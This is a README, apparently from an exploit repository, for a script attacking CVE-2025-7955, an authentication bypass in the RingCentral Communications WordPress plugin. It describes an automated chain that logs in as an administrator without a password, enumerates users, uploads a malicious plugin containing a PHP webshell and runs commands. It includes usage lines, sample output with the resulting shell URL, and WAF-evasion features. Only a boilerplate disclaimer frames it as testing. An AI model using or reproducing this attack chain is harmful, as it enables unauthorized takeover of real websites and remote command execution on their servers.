# CVE-2025-7955
RingCentral Communications 1.5 - 1.6.8 - Missing Server‑Side Verification to Authentication Bypass via ringcentral_admin_login_2fa_verify Function

# 🚨 CVE-2025-7955 | RingCentral Communications WordPress Exploit

---

## 📝 Vulnerability Overview

**CVE:** CVE-2025-7955  
**Affected Plugin:** RingCentral Communications (WordPress)  
**Affected Versions:** 1.5 – 1.6.8  
**CVSS Score:** 9.8 (Critical)  
**Type:** Authentication Bypass (Missing Server-Side Verification)  

> _The RingCentral Communications plugin for WordPress is vulnerable to an Authentication Bypass due to improper validation within the `ringcentral_admin_login_2fa_verify()` function. Versions **1.5 to 1.6.8** allow unauthenticated attackers to log in as any user simply by supplying identical bogus codes._

---

## ⚡ Script Functionality

This exploit automates the entire attack chain for **CVE-2025-7955**. It is designed to:

- **Bypass authentication**: The script logs into WordPress as any user (usually admin) without needing a password, exploiting the vulnerable 2FA endpoint.
- **Auto-discover usernames**: If the username is not provided, the script will attempt to enumerate it via the WordPress REST API (`/wp-json/wp/v2/users/ID`).
- **Extract required tokens**: Automatically fetches the CSRF protection nonce needed for plugin uploads.
- **Upload a malicious plugin (webshell)**: Once authenticated, the script uploads a ZIP plugin containing a PHP webshell.
- **Command execution via webshell**: After successful upload, the script demonstrates code execution by running `whoami` through the shell and prints the output.
- **Stealth & evasion features**: Uses random delays, a rotating User-Agent list, and basic WAF/captcha detection to bypass simple protections.

---

## 🚀 Usage

1. **Prepare your malicious plugin**  
   Ensure you have your malicious plugin ZIP file (default: `Nxploit.zip`) in the same directory as the script.

2. **Run the exploit:**  
   ```bash
   python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
   ```
   - `-u`, `--url`      : **(required)** Target WordPress site URL
   - `-user`, `--username` : *(optional)* Username to log in as (auto-discovered if omitted)
   - `-id`, `--id_admin`   : *(default: 1)* User ID (admin is usually ID 1)
   - `-z`, `--zip`         : *(default: Nxploit.zip)* Path to malicious plugin ZIP

3. **Example:**  
   ```bash
   python3 CVE-2025-7955.py -u http://target/wordpress
   ```
   or specify username/ID:
   ```bash
   python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1
   ```

---

## ✅ Expected Successful Output

```
888b    888                   888          d8b 888                 888 
8888b   888                   888          Y8P 888                 888 
88888b  888                   888              888                 888 
888Y88b 888 888  888 88888b.  888  .d88b.  888 888888 .d88b.   .d88888 
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888   d8P  Y8b d88" 888 
888  Y88888   X88K   888  888 888 888  888 888 888   88888888 888  888 
888   Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b.     Y88b 888 
888    Y888 888  888 88888P"  888  "Y88P"  888  "Y888 "Y8888   "Y88888 
                     888                                               
                     888                                               
                     888                                               
CVE-2025-7955 Exploit By : Nxploited 

[*] Using User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Attempting login as: admin (ID: 1)
[+] Login successful!
[+] Nonce: 661e57f2e4
[*] Uploading malicious plugin...
[+] Plugin uploaded successfully!
[*] Executing: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND
```

---

## 🎯 Key Features

- **No password required**: Exploits a logic flaw to fully bypass authentication.
- **Automatic enumeration**: Can extract usernames and IDs via public API.
- **Hands-free exploitation**: From login to webshell upload to command execution, all steps are automated.
- **Bypass basics**: Random delays, header spoofing, and basic protection detection.
- **Modular**: Easily modify the plugin payload or add features as needed.

---

## ⚠️ Disclaimer

This tool is **for authorized security testing and educational use only**.  
Unauthorized use against systems you do not own or have explicit permission to test is **illegal** and unethical.  
The author assumes **no responsibility** for any misuse or damages caused by this script.

---

*By: Khaled Alenazi (Nxploited)*
